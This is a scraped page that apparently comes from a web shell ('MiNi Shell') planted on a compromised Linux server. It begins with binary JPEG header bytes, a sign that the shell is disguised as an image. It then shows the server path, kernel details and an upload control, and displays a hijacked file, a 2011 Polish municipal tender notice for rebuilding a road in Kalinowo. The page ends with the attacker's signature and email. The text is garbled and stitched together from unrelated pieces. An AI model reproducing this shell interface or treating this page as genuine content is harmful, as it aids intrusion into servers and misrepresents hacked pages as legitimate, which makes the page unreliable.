JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110204/41467-N-2011.html

<p class="kh_header"><b>Kalinowo: Przebudowa odcinka drogi gminnej publicznej  Mikołajki - Szczudły, gm. Kalinowo</b><br>
<b>Numer ogłoszenia: 41467 - 2011; data zamieszczenia: 04.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kalinowo , ul. Mazurska 11, 19-314 Kalinowo, woj. warmińsko-mazurskie, tel. 087 621 87 60, faks 087 621 87 77.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa odcinka drogi gminnej publicznej  Mikołajki - Szczudły, gm. Kalinowo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest:

     Przebudowa odcinka drogi gminnej publicznej  Mikołajki - Szczudły, gm. Kalinowo wg opracowanej dokumentacji technicznej - zgodnie z obowiązującymi przepisami i normami.

Szczegółowy zakres rzeczowy przedmiotu zamówienia:
 Przedmiotem opracowania jest przebudowa odcinka drogi gminnej publicznej Mikołajki - Szczudły o łącznej długości 4.100 mb. Droga stanowi bezpośrednie połączenie drogi powiatowej nr 1909 N Wieliczki - Wysokie z drogą krajową nr 16 Ełk - Augustów oraz z drogą powiatową nr 1931 N Golubie- Golubka. Celem opracowania jest poprawa bezpieczeństwa ruchu drogowego, która zrealizowana zostanie poprzez  wykonanie: nowej nawierzchni jezdni, poboczy, zjazdów indywidualnych i publicznych, zatoki autobusowej w m. Golubie, odcinków chodnika w m. Mikołajki i Golubie oraz wykonanie oznakowanie pionowego i poziomego oraz urządzeń bezpieczeństwa ruchu: barier energochłonnych i progu zwalniającego w m. Golubie.
        Celem opracowania jest również zwiększenie parametrów technicznych nawierzchni poprzez uzyskanie dopuszczalnego nacisku osi pojazdu na drogę równemu 80 kN na oś.
1.1.  Dane techniczno - projektowe
- klasa drogi - L,
- prędkość projektowa: 30 km na godz. - na terenie zabudowanym,
- prędkość projektowa: 40 km na godz. - poza terenem zabudowanym,
- obciążenie ruchem - kategoria ruchu KR1,
- szerokość jezdni - 4,50 m,
- szerokość poboczy - 2x1,00 m,
- szerokość korony - 6,50 m,
- spadek poprzeczny jezdni - 2%,
- spadek poprzeczny poboczy - 6%
1.2. Rozwiązania sytuacyjne
Początek opracowania przyjęto w km rob. 0+000 na krawędzi drogi powiatowej nr 1909 N w m. Mikołajki, koniec w km rob. 4+100,00 poza zabudowaniami m. Golubie w kierunku m. Szczudły.
W m. Golubie zlokalizowane jest skrzyżowanie z drogą powiatową nr 1931 N, które przebudowane zostało na skrzyżowanie zwykłe. W m. Mikołajki oraz w m. Golubie zaprojektowano odcinki chodnika oraz w m. Golubie przy drodze powiatowej zaprojektowano zatokę autobusową.
Zinwentaryzowane załamania trasy w planie zostały złagodzone poprzez wpisanie kołowych łuków poziomych, przy maksymalnym wykorzystaniu istniejącej nawierzchni jako podbudowy. Przyjęto łuki poziome o promieniach odpowiadających obowiązującym warunkom technicznym.

1.3. Rozwiązania wysokościowe
W ramach przebudowy drogi przewiduje się zmianę niwelety istniejącej nawierzchni, co wpłynie na jej prawidłowe ukształtowanie oraz pozwoli na sprawne odwodnienie drogi. Płynność niwelety została uzyskana przez nadanie jej spadków podłużnych gwarantujących prawidłowe odwodnienie.Projektowane załamania niwelety wymagające zastosowania łuków pionowych zostały wyokrąglone
łukami pionowymi o promieniach odpowiadających obowiązującym warunkom technicznym.
1.4. Przekrój normalny
Dla przebudowywanego odcinka drogi przyjęto przekrój normalny o następujących parametrach
technicznych:
- szerokość jezdni - 4,50 m,
- szerokość poboczy - 2x1,00 m,
- szerokość chodnika - 1,50 - 2,00 m,
- spadek poprzeczny jezdni na prostej - 2%,
- spadek poprzeczny jezdni na łukach - zgodnie z normatywem,
- spadek poprzeczny poboczy - 6%,
- pochylenie skarp - 1:1,5,
- głębokość rowów przydrożnych - min. 0,75 m.
1.5. Konstrukcja nawierzchni
W oparciu o ocenę nośności podłoża gruntowego i kategorię ruchu KR-1, przyjęto następującą konstrukcję elementów nawierzchni drogi:
jezdnia:
- warstwa ścieralna z betonu asfaltowego gr. 4 cm,
- warstwa wiążąca z betonu asfaltowego gr. 5 cm,
- podbudowa z mieszanki kruszywa naturalnego 0-31,5 stabilizowanego mechanicznie gr. 20 cm.
pobocza:
- nawierzchnia z mieszanki kruszywa naturalnego gr. 9 cm,
- podbudowa z mieszanki kruszywa naturalnego 0-31,5 stabilizowanego mechanicznie gr. 20 cm.
zjazdy z betonu asfaltowego:
- warstwa ścieralna z betonu asfaltowego gr. 4 cm,
- podbudowa z mieszanki kruszywa naturalnego 0-31,5 stabilizowanego mechanicznie gr. 20 cm.
zjazdy z betonowej kostki brukowej:
- warstwa ścieralna z betonowej kostki brukowej gr. 8 cm,
- podsypka cementowo - piaskowa 1:4 gr. 3 cm,
- podbudowa z mieszanki kruszywa naturalnego 0-31,5 stabilizowanego mechanicznie gr. 20 cm.
chodniki:
- warstwa ścieralna z betonowej kostki brukowej gr. 6 cm,
- podsypka cementowo - piaskowa 1:4 gr. 5 cm,
- podbudowa z mieszanki kruszywa naturalnego 0-31,5 stabilizowanego mechanicznie gr. 10 cm.
zatoka autobusowa:
- warstwa ścieralna z betonowej kostki brukowej gr. 8 cm,
- podsypka cementowo - piaskowa 1:4 gr. 3 cm,
- podbudowa zasadnicza z betonu cementowego C16-20 gr. 22 cm,
- podbudowa z mieszanki kruszywa naturalnego 0-31,5 stabilizowanego mechanicznie gr. 20 cm.
ściek drogowy:
- ściek drogowy korytkowy o wym. 50x60 cm gr. 15 cm,
- podsypka cementowo - piaskowa 1:4 gr. 5 cm,
- podbudowa zasadnicza z betonu cementowego C8-10 gr. 20 cm.
Wzmocnienie słabonośnego podłoża:
Z uwagi na zaleganie w podłożu gruntu słabonośnego zaprojektowano wzmocnienie podłoża na odcinku od km 2+620 do km 2+754. W celu sprawdzenia konstrukcji wzmocnienia, wykonano analizę obliczeniową według teorii wielowarstwowej półprzestrzeni sprężystej, przy wykorzystaniu programu komputerowego ELSYM 5M. Obliczono ugięcie pod kołem 40 kN /oś 80 kN/ na wzmocnionym podłożu, a następnie wykorzystując wzór Boussinesqa obliczono moduł zastępczy.
Konstrukcja wzmocnienia podłoża (warstwy od góry do dołu)
- grunt stabilizowany cementem o Rm=2,5 Mpa gr. 15 cm,
- kruszywo łamane 0/31,5 stabilizowane mechanicznie wg PN-S-06102:1997 gr. 20 cm,
- georuszt trójosiowy o sztywnych węzłach typu Q16,
- geowłóknina polipropylenowa typu G20.
Sumaryczna grubość konstrukcji wzmocnienia - 35 cm.
Wzmocnienie słabonośnego podłoża należy wykonać na odcinku od km 2+260 do km 2+754.
Wymiana gruntu słabonośnego podłoża:
Z uwagi na zaleganie w podłożu gruntu słabonośnego zaprojektowano wymianę gruntu podłoża na odcinku od km 0+261,5 do km 0+420,0.
1.6. Odwodnienie
Celem poprawy istniejącego stanu odwodnienia, które odbywa się poprzez powierzchniowy spływ wód opadowych do istniejących urządzeń odwadniających i na teren przyległy przewiduje się:
- przebudowę istniejących przepustów z rur Żelbetowych pod koroną drogi polegającą na wymianie
całego przepustu na rury PEHD wraz z obrukowaniem wlotów i wylotów brukowcem:
- w km 1+767 o śr. 40 cm i długości L=9,0 m,
- w km 2+673 istniejący przepust - wykonanie ścianek czołowych przepustu,
- w km 2+822 o śr. 60 cm i długości L=12,0 m,
- w km 2+833 o śr. 60 cm i długości L=10,0 m,
- w km 3+964 o śr. 60 cm i długości L=10,0 m.
budowę nowych przepustów z rur PEHD wraz z obrukowaniem wlotów i wylotów brukowcem:
- w km 0+285 o śr. 60 cm i długości L=12,0 m,
- w km 0+666 o śr. 40 cm i długości L=9,0 m,
- w km 2+341 o śr. 40 cm i długości L=13,0 m,
- w km 2+730 o śr. 40 cm i długości L=7,0 m wraz z wpustem ulicznym,
- w km 3+023 o śr. 40 cm i długości L=10,0 m,
- w km 3+171 o śr. 40 cm i długości L=8,0 m wraz z wpustem ulicznym.
- wykonanie odcinków ścieków drogowych korytkowych wzdłuż jezdni drogi
- oczyszczenie i pogłębienie istniejących rowów odwadniających,
- wykonanie nowych odcinków rowów odwadniających,
- wykonanie przepustów pod zjazdami z rur PVC o śr. 40 cm.
1.7. Skrzyżowania
W ciągu drogi występują skrzyżowania:
- w km 0+000 - skrzyżowanie z drogą powiatową nr 1909 N w m. Mikołajki,
- w km 2+556 - skrzyżowanie z drogą powiatową nr 1931 N w m. Golubie.
Skrzyżowania przebudowywanej drogi projektuje się jako skrzyżowanie zwykłe, przy przyjęciu promieni skrętów od 7 do 8 m.
1.8. Urządzenia obce
Na odcinku drogi objętym niniejszym opracowaniem występuje następujące uzbrojenie:
- kabel telekomunikacyjny,
- sieć wodociągowa,
- kablowa linia energetyczna nN,
- napowietrzna linia energetyczna nN i SN.
Uzbrojenie wkracza odcinkowo w pas drogowy nie kolidując z przyjętymi rozwiązaniami projektowymi.
Przebudowa drogi nie wymaga przebudowy istniejącego uzbrojenia.
1.9. Organizacja ruchu i urządzenia brd
W stanie istniejącym odcinki dróg objętych opracowaniem pozbawione są jakiegokolwiek oznakowania pionowego, poziomego i urządzeń bezpieczeństwa ruchu drogowego.Na skrzyżowaniu dróg w m. Golubie wprowadzono organizację ruchu regulującą przebieg drogi z pierwszeństwem przejazdu. Zaprojektowano oznakowanie pionowe wyznaczające obszar zabudowany m. Mikołajki i Golubie, przejścia dla pieszych w obu miejscowościach oraz próg zwalniający
w m. Golubie w pobliżu skrzyżowania z drogą powiatową. W miejscach wysokich nasypów zaprojektowano odcinki barier ochronnych stalowych.
Projekt stałej organizacji ruchu stanowi odrębne opracowanie wchodzące w skład kompletnej dokumentacji przebudowy drogi gminnej.
1. 10. Zieleń
Przebudowa drogi wymaga usunięcia 35 sztuk drzew kolidujących z projektowanym przebiegiem
trasy oraz krzaków występujących w istniejących pogłębianych rowach odwadniających w celu poprawy odprowadzania wód opadowych. Drzewa nie przeznaczone do usunięcia należy na czas prowadzenia robót zabezpieczyć przed uszkodzeniami poprzez owinięcie pni drzew matami słomianymi i deskami.  

Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 5 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium wynosi 50000,00 złotych (pięćdziesiąt tysięcy złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz co najmniej dwóch robót wykonanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielnie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia ( w zakresie przebudowy, remontu lub budowy dróg o nawierzchni bitumicznej),  ale nie mniej niż 500 tys. złotych każda, z podaniem ich wartości oraz dat i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni czy Wykonawca spełnia warunki wymagane w specyfikacji istotnych warunków zamówienia (wg zasady spełnia/ nie spełnia) na podstawie dokumentów przedstawionych przez Wykonawcę w ofercie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca dołączy polisę lub inny dokument ubezpieczenia potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 200 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dowód wniesienia wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.kalinowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kalinowo  ul. Mazurska 11, 19-314 Kalinowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.02.2011 godzina 09:00, miejsce: Urząd Gminy Kalinowo  ul. Mazurska 11, 19-314 Kalinowo pokój nr 6 /sekretariat/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie będzie współfinansowane z budżetu państwa w ramach Programu Wieloletniego pn. Narodowy Program Przebudowy Dróg Lokalnych 2008-2011..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com